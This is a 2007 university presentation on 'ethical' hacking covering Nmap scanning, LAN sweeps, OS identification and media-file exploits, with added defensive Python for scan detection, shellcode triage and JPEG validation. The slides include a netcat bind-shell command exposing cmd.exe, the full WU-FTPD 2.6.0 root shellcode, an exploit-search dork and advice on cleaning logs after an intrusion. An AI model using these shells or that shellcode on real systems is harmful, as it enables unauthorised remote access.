Security & “Ethical” Hacking

Luke Arntson
Central Washington University
Winter 2007
Presentation #2 – Advanced Scanning & Exploitation
Introduction

Again, “ethical” hacking.
Do you sniff before you taste?
Patience, persistence, and some other motivational P word…
Have phun; getting frustrated is normal.
About Me
Overview

Advanced scanning with NMAP (as seen in The Matrix)
Local IP sweeping and its importance
Netcat rooting, a simple shell
Identify station (operating system)
Brief exploit talk and shell code
Exploits via JPGs, PNGs, MP3s, etc.
Conclusion
Advanced Scanning (NMAP)

OK, we have acquired an IP (or a range of them) and we want to find out some information about this system.
We will use a very popular program named Nmap.
Almost every Linux install has it packaged; on Windows you will need to download Nmap and the WinPcap files.
Advanced Scanning (NMAP)

Let's look at some of the scan techniques listed in nmap's own help output:
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags <flags>: Customize TCP scan flags
-sI <zombie host[:probeport]>: Idlescan
-sO: IP protocol scan
-b <ftp relay host>: FTP bounce scan

We will be using another scan technique to probe open ports and determine the services/versions in use: -sV
Advanced Scanning (NMAP)

So let's run a -sV scan along with -v for verbose and -O for OS detection.
Advanced Scanning (NMAP)

So, lots of gibberish, but we can sort through this for VERY important details!
First: we have all of the open ports, along with what versions they are running! Port 139... very interesting.
Second: we also found out the operating system! Windows 98 SE… that will come up later.
Protection from NMAP

Keep those firewalls up if you're not a server and you're not hosting anything.
There is not much else you can do, and NMAP can be extremely stealthy using advanced techniques.
It is scary how much information can be acquired about you by a simple sniff and run.
Local IP Sweeping

The LAN is generally the weakest network.
Open ports, open boxes, free IPs, easy sweeps.
The vast majority of people assume the other computers within the LAN are not hackers, but compromise a wireless router and bam…
Using Angry IP Scanner Again!

Angry IP Scanner: it's script-kiddie, but it works very well and is faster than NMAP.
Let's grab our local IP on the network and begin our scan. Say we are currently 192.168.5.100, so we know our range is 192.168.5.*.
Use Angry IP Scanner just to find the available peers on the network; this is VERY useful from a compromised wireless router or a compromised system behind a router.
We Have Local Victims!

Okay, we have local victims; we can now use Nmap on each victim.
Nmap will also get past firewalls that block ping, given enough time, with the -P0 option (don't ping first).
Once we know operating systems and open ports, we can use online security search tools such as www.securityfocus.com and locate exploits!
Importance of Local Sweeps

Compromised routers = compromised systems, vulnerable on the inside only.
Apply a full-control rootkit to a computer behind a router and you have LAN access… hence local IP sweeping.
Viruses often spread within a network (commercial, government, etc.) using LAN sweeps.
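The slides say "there is not much you can do" about NMAP and that LAN sweeps are how worms and intruders find their next hosts, but both leave a signature in firewall logs: one source touching many hosts in a short time (a sweep), or one source touching many ports on one host (a port scan). The detector below is an added example written for this page, not something from the presentation; the iptables-style log lines, addresses and thresholds are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# iptables-style log lines as a perimeter or host firewall would write them.
# Everything below is constructed for this example; the addresses are private and made up.
LINE_RE = re.compile(r"^(\S+) \S+ kernel: .*SRC=(\S+) DST=(\S+) PROTO=(\S+) .*DPT=(\d+)")

def _log_line(ts, src, dst, dport):
    return (f"{ts.isoformat()} gw kernel: IN=eth1 OUT= SRC={src} DST={dst} "
            f"PROTO=TCP SPT=40000 DPT={dport} SYN")

def constructed_log():
    t0 = datetime(2007, 2, 1, 10, 0, 0)
    lines = []
    # 1) horizontal sweep: one source knocks on port 139 of 30 neighbours in 30 s
    for i in range(1, 31):
        lines.append(_log_line(t0 + timedelta(seconds=i), "192.168.5.100", f"192.168.5.{i}", 139))
    # 2) vertical port scan: another source probes 40 ports on one host in 40 s
    for port in range(1, 41):
        lines.append(_log_line(t0 + timedelta(seconds=60 + port), "192.168.5.77", "192.168.5.23", port))
    # 3) benign: a workstation opening a few web connections to the gateway
    for i in range(5):
        lines.append(_log_line(t0 + timedelta(seconds=200 + 10 * i), "192.168.5.50", "192.168.5.1", 80))
    return lines

def parse_line(line):
    """Return (timestamp, src, dst, dport) or None for lines that are not connection logs."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m.group(1)).timestamp()
    return (ts, m.group(2), m.group(3), int(m.group(5)))

def detect_scans(lines, window=60, port_threshold=15, host_threshold=10):
    """Sliding-window detector: per source, count distinct hosts (sweep) and
    distinct ports per host (port scan) seen within `window` seconds.
    Each condition is reported once per source (or per source/host pair)."""
    events = sorted(e for e in map(parse_line, lines) if e)
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        sweep_reported = False
        scanned_hosts = set()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            hosts = {dst for _, _, dst, _ in win}
            if len(hosts) >= host_threshold and not sweep_reported:
                alerts.append(f"sweep: {src} touched {len(hosts)} hosts within {window}s")
                sweep_reported = True
            ports_per_dst = defaultdict(set)
            for _, _, dst, dport in win:
                ports_per_dst[dst].add(dport)
            for dst, ports in ports_per_dst.items():
                if len(ports) >= port_threshold and dst not in scanned_hosts:
                    alerts.append(f"port scan: {src} probed {len(ports)} ports on {dst} within {window}s")
                    scanned_hosts.add(dst)
    return alerts

if __name__ == "__main__":
    for alert in detect_scans(constructed_log()):
        print(alert)
```

The thresholds are the knobs to tune: a workstation that talks to ten printers in a minute will look like a sweep, and a web proxy will look like it is talking to many ports, so a real deployment would whitelist known scanners and servers and raise the counts to fit the network. Note that the detector only needs the SYN lines a firewall already logs; it does not depend on the scanner being noisy.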
Netcat Rooting (Simple Shell)

OK, we want to see what kind of access a shell really has on a system.
Shell here refers to a command-prompt window on another computer.
Netcat is a very useful raw TCP/UDP client/server that can also double as a nice shell.
A Windows version is free to download; Linux generally comes with nc in the shell already.
Client/Server

Determine which computer you want to have a shell on, and put nc.exe somewhere on there.
Next run nc.exe with the following parameters:
nc.exe -l -p 666 -e cmd.exe
This tells Netcat to listen on port 666; when a client connects, it executes cmd.exe on the server and passes its input and output over the connection.
Client Connection

The client now connects to the server using the corresponding line:
nc.exe 192.168.77.2 666
And voilà! A Netcat shell over the network.
Why Netcat Root?

A nice way to make your first root; easy to expand on this.
The potential is HUGE when the -e “???” option is used.
Netcat is open source, so you can venture into the source code to understand exactly how Netcat does this.
This also works in Unix; just replace cmd.exe with a Unix shell ;)
Identify Station

Continuation of Nmap OS discovery.
Once we have found a target, what kind of operating system is it running?
The Nmap -O command will usually show you, unless the computer has a firewall on.
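Both the -sV slide (open ports with versions, port 139, Windows 98 SE) and this one read the same human-oriented Nmap output by eye. The parser below is an added example for this page, not code from the presentation: it pulls the host, the port table and the OS lines out of that text and turns them into findings an administrator can act on (exposed file sharing, cleartext logins, an operating system past its support life). The sample output is constructed in the Nmap 4.x layout of the time, and the watch-list of risky services and legacy OS names is an assumption for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of `nmap -sV -O` output in the Nmap 4.x layout (host, ports,
# versions and MAC are made up for this example; not real scan data).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 4.20 ( http://insecure.org ) at 2007-02-01 10:00 PST
Interesting ports on 192.168.5.23:
Not shown: 1694 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
80/tcp   open  http         Microsoft IIS webserver 4.0
139/tcp  open  netbios-ssn  Microsoft Windows 98 netbios-ssn
MAC Address: 00:11:22:33:44:55 (Unknown)
Device type: general purpose
Running: Microsoft Windows 95/98/ME
OS details: Microsoft Windows 98 SE
Network Distance: 1 hop
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Nmap 4.x says "Interesting ports on X:", newer versions say "Nmap scan report for X"
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for) (.+?):?$")

@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str

@dataclass
class HostReport:
    host: str = ""
    ports: list = field(default_factory=list)
    os_running: str = ""
    os_details: str = ""

def parse_nmap_output(text: str) -> HostReport:
    """Pull host, port table and OS guess out of Nmap's human-readable output."""
    report = HostReport()
    for line in text.splitlines():
        line = line.rstrip()
        m = HOST_RE.match(line)
        if m:
            report.host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            report.ports.append(PortRecord(int(m.group(1)), m.group(2), m.group(3),
                                           m.group(4), m.group(5).strip()))
            continue
        if line.startswith("Running: "):
            report.os_running = line[len("Running: "):]
        elif line.startswith("OS details: "):
            report.os_details = line[len("OS details: "):]
    return report

# Services a defender would not want reachable from untrusted networks
# (cleartext logins or file sharing); assumed watch-list for this example.
RISKY_SERVICES = {
    "ftp": "cleartext logins",
    "telnet": "cleartext logins",
    "netbios-ssn": "SMB file sharing exposed",
    "microsoft-ds": "SMB file sharing exposed",
}
LEGACY_OS_MARKERS = ("Windows 95", "Windows 98", "Windows ME")

def review(report: HostReport) -> list:
    """Turn the parsed scan into findings an administrator should act on."""
    findings = []
    for p in report.ports:
        if p.state == "open" and p.service in RISKY_SERVICES:
            findings.append(f"{report.host} {p.port}/{p.proto} {p.service} "
                            f"({p.version or 'unknown version'}): {RISKY_SERVICES[p.service]}")
    os_text = report.os_details or report.os_running
    if any(marker in os_text for marker in LEGACY_OS_MARKERS):
        findings.append(f"{report.host}: legacy operating system '{os_text}' "
                        "no longer receives security updates")
    return findings

if __name__ == "__main__":
    for finding in review(parse_nmap_output(SAMPLE_NMAP_OUTPUT)):
        print(finding)
```

Nmap can also emit XML (-oX) and greppable (-oG) output, which are the better choice for anything beyond a one-off script; the text parser is shown here because the text format is what the slides display. Run against your own hosts, the same findings list is the checklist for what to firewall off or upgrade before someone else's scan finds it.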
Importance of OS ID

Exploiting, and the choice of exploits/roots, is always dependent on the type of OS.
Do we want to look for likely exploits, find a more aggressive approach, or leave it?
For example, Linux servers often have an SSH server open; we can either nmap -sV and exploit, or try to brute-force.
We need to know what we are trying to hack, especially when cleaning up after a successful hack (log files, email reports of floods / brute-force attempts, rootkits, etc.).
Brief Exploits & Shell Code

Exploits come in all sorts of languages and sizes. Some are simply run once against an IP; others have various options and offsets.
Exploits are used as a way of getting into a system; shell code is what happens AFTER the exploit is successful.
Shell code will always vary with experienced hackers, as they will always have useful shells on hand.
Example Shellcode used by the WU-FTPD 2.6.0 REMOTE ROOT EXPLOIT

char linuxcode[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
This is machine code that makes specific Linux system calls, including chroot(), and gives the hacker a shell on the vulnerable system.
This is public knowledge; just type the following into Google:
wuftpd exploit filetype:c
More on Shells Later

Creating shells is an entirely different topic, and we will go into how they actually figure out which machine code to use and where to inject it in a later presentation.
Shells are scary to look at because, if you do not know the machine code or the system it's intended for, there is absolutely no way to know what it's doing, yet it can compromise a system!
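The slide says there is "absolutely no way to know" what a blob like the WU-FTPD shellcode above does without reading the machine code. An analyst triaging a captured payload does not need a full disassembler to get a first answer, because Linux i386 shellcode of this era makes every system call through `int 0x80` with the call number loaded into `al` or `eax` just before it. The script below is an added example for this page, not part of the presentation: it decodes the C string literal from the slide, lists the system calls in the order they appear, and pulls out the printable strings. The syscall table is the subset of the i386 numbers I know from unistd_32.h.

```python
import re

# The C string literal from the slide, copied as text so the parser below can decode it.
SLIDE_SHELLCODE_C = r"""
char linuxcode[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
"""

# Linux i386 system call numbers (subset of unistd_32.h) that commonly appear in old shellcode.
SYSCALLS_I386 = {
    1: "exit", 2: "fork", 3: "read", 4: "write", 5: "open", 6: "close",
    11: "execve", 12: "chdir", 23: "setuid", 39: "mkdir", 46: "setgid",
    61: "chroot", 63: "dup2", 70: "setreuid", 102: "socketcall",
}

def c_string_to_bytes(src: str) -> bytes:
    """Decode every \\xNN escape in a C string literal into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", src))

def find_int80_syscalls(code: bytes):
    """Locate `mov al, imm8` (b0 NN) or `mov eax, imm32` (b8 NN NN NN NN) immediately
    followed by `int 0x80` (cd 80) and name the call. Returns (offset, number, name)."""
    found = []
    for off in range(len(code)):
        if code[off] == 0xB0 and code[off + 2:off + 4] == b"\xcd\x80":
            num = code[off + 1]
        elif code[off] == 0xB8 and code[off + 5:off + 7] == b"\xcd\x80":
            num = int.from_bytes(code[off + 1:off + 5], "little")
        else:
            continue
        found.append((off, num, SYSCALLS_I386.get(num, f"syscall_{num}")))
    return found

def printable_runs(code: bytes, min_len: int = 4):
    """Extract runs of printable ASCII, the way the `strings` tool would."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, code)]

def triage(c_source: str) -> dict:
    """Summarise a C-literal shellcode: size, syscall sequence, embedded strings."""
    code = c_string_to_bytes(c_source)
    return {
        "length": len(code),
        "syscalls": [name for _, _, name in find_int80_syscalls(code)],
        "strings": printable_runs(code),
    }

if __name__ == "__main__":
    summary = triage(SLIDE_SHELLCODE_C)
    print(summary["length"], "bytes")
    print("syscall sequence:", " -> ".join(summary["syscalls"]))
    print("embedded strings:", summary["strings"])
```

For the slide's payload the sequence comes out as setreuid, dup2, mkdir, chroot, chdir, chroot, execve, exit, with the string "0bin0sh1..11" at the end. That is the textbook chroot() escape the slide's comment hints at: create a directory, chroot into it, chdir("..") repeatedly in a loop (the chdir sits between two `dec` instructions and a conditional jump), chroot(".") again, then execve the string, which the code patches into "/bin/sh" at runtime by overwriting the '0' separators. The heuristic has limits worth knowing: it misses calls made with a register that was loaded earlier or via `push`/`pop`, it cannot follow self-modifying or encoded payloads, and a `b0 NN cd 80` pattern can occur by accident in other data, so it is a first pass before a disassembler, not a substitute for one.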
Exploits via Jpg, Pngs, Mp3s

Exploits come in many varieties, as it just takes a stray string call or a bad size check to make a program vulnerable.
All sorts of formats have been vulnerable, for example the famous GDI+ JPG vulnerability that would execute code just by viewing a JPG!
GDI+ Jpg vulnerability
Posted on Sept. 30, 2004
“In the exploit attempts against AIM users, intruders post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM users enticing them to view that profile. When someone views such a profile and the JPEG image loads, the viewing user's computer is then infected.
Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and “Backdoor.Roxe”, are spreading although neither appears to have spread to more than 50 computers at the time of this writing.”
– Mark Joseph Edwards
http://www.windowsitpro.com/Articles/ArticleID/44075/44075.html?Ad=1
Exploits via Jpg, Pngs, Mp3s

Other vulnerabilities in the form of PNGs and MP3s have come into the wild.
One MP3 would use the header to execute a shell in Winamp when the metadata was loaded.
A PNG exploit in MSN Messenger would allow hackers to put shellcode in a PNG and display it as a buddy icon to other users.
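The "bad size check" the earlier slide mentions is exactly what the GDI+ JPEG bug was: every JPEG marker segment starts with a 16-bit length that counts its own two bytes, so a valid value is never below 2, and a decoder that computes `length - 2` without checking underflows when a comment segment declares 0 or 1. A defender-side check before an image reaches a fragile decoder is to walk the marker segments and refuse anything whose declared lengths do not add up. The walker below is an added example for this page, not from the presentation; the two sample files are constructed (a header-only JPEG and the same file with a lying COM length), and the check stops at the start-of-scan marker because the entropy-coded data after it is not a list of length-prefixed segments.

```python
import struct

SOI, EOI, SOS, APP0, COM = 0xD8, 0xD9, 0xDA, 0xE0, 0xFE
# Markers that carry no length field: SOI, EOI, TEM and the RSTn restart markers.
STANDALONE = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))

def walk_jpeg_segments(data: bytes):
    """Walk the marker segments that precede image data and check every declared
    length. Returns [(marker, length, offset), ...]; raises ValueError on the first
    structural problem."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    segments = []
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte, skip it
            pos += 1
            continue
        if marker in STANDALONE:
            segments.append((marker, 0, pos))
            pos += 2
            if marker == EOI:
                return segments
            continue
        if pos + 4 > len(data):
            raise ValueError(f"truncated length field for marker 0x{marker:02X} at offset {pos}")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        # The length counts its own two bytes, so anything below 2 is malformed;
        # a decoder that computes `length - 2` without this check underflows.
        if length < 2:
            raise ValueError(f"marker 0x{marker:02X} at offset {pos} declares length {length} (< 2)")
        if pos + 2 + length > len(data):
            raise ValueError(f"marker 0x{marker:02X} at offset {pos} runs past end of data")
        segments.append((marker, length, pos))
        pos += 2 + length
        if marker == SOS:
            return segments           # entropy-coded scan data follows
    raise ValueError("no EOI marker before end of data")

def check_jpeg(data: bytes):
    """Return (True, segments) for well-formed headers or (False, reason)."""
    try:
        return True, walk_jpeg_segments(data)
    except ValueError as exc:
        return False, str(exc)

def _segment(marker: int, payload: bytes, declared_length=None) -> bytes:
    """Build one marker segment; declared_length lets a test lie about the size."""
    length = len(payload) + 2 if declared_length is None else declared_length
    return b"\xff" + bytes([marker]) + struct.pack(">H", length) + payload

# Constructed samples: a minimal header-only JPEG and one whose COM segment lies about its size.
JFIF_PAYLOAD = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"   # JFIF 1.1, no thumbnail
GOOD_JPEG = (b"\xff\xd8" + _segment(APP0, JFIF_PAYLOAD)
             + _segment(COM, b"constructed sample") + b"\xff\xd9")
BAD_JPEG = (b"\xff\xd8" + _segment(APP0, JFIF_PAYLOAD)
            + _segment(COM, b"constructed sample", declared_length=1) + b"\xff\xd9")

if __name__ == "__main__":
    for name, blob in (("good", GOOD_JPEG), ("bad", BAD_JPEG)):
        ok, info = check_jpeg(blob)
        print(name, "OK" if ok else "REJECTED:", info)
```

The same discipline applies to the PNG and MP3 cases on the next slide: PNG chunks and ID3 frames are also length-prefixed, and "is this length consistent with the bytes that remain, and with the minimum the format allows" is the check that was missing in each of those parsers. A validator like this belongs in front of the decoder (in a mail gateway, an upload handler, or a chat client's icon loader), since a file that fails it has no legitimate reason to be rendered.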
Just because it's media…

Just because you're viewing a jpg, png, mp3 or wmv, you could still be running something that exploits your computer.
Many people think exploits come only in the limited forms of scripts, TCP/UDP injections or executables, but there are many ways in.
Resources

If this type of information interests you, there are many safe online resources.
www.hackthissite.org - a friendly playground for web hackers
www.phrack.org - a very good place for random articles with great pieces of info
www.securityfocus.com - some of the best up-to-date info about vulnerabilities and exploits.
Conclusion

Again, I emphasize: just because I'm showing you this does NOT make it legal.
In fact, scanning government systems with NMAP and getting caught can land you with fines and possible jail time. Running exploits with shellcode you do not trust could be exposing your test system to a wild virus or backdoor you do not know about.
Remember, finding exploits that work is tedious; not everything you find online works every time.
Set up a fun box (something like Mandrake) and install some vulnerable software on there. See if you can break into it, e.g. WU-FTPD 2.6.0. Have fun; it takes work, so don't give up!
Thank You For Your Time!
Feel free to email me any questions/comments at [email protected]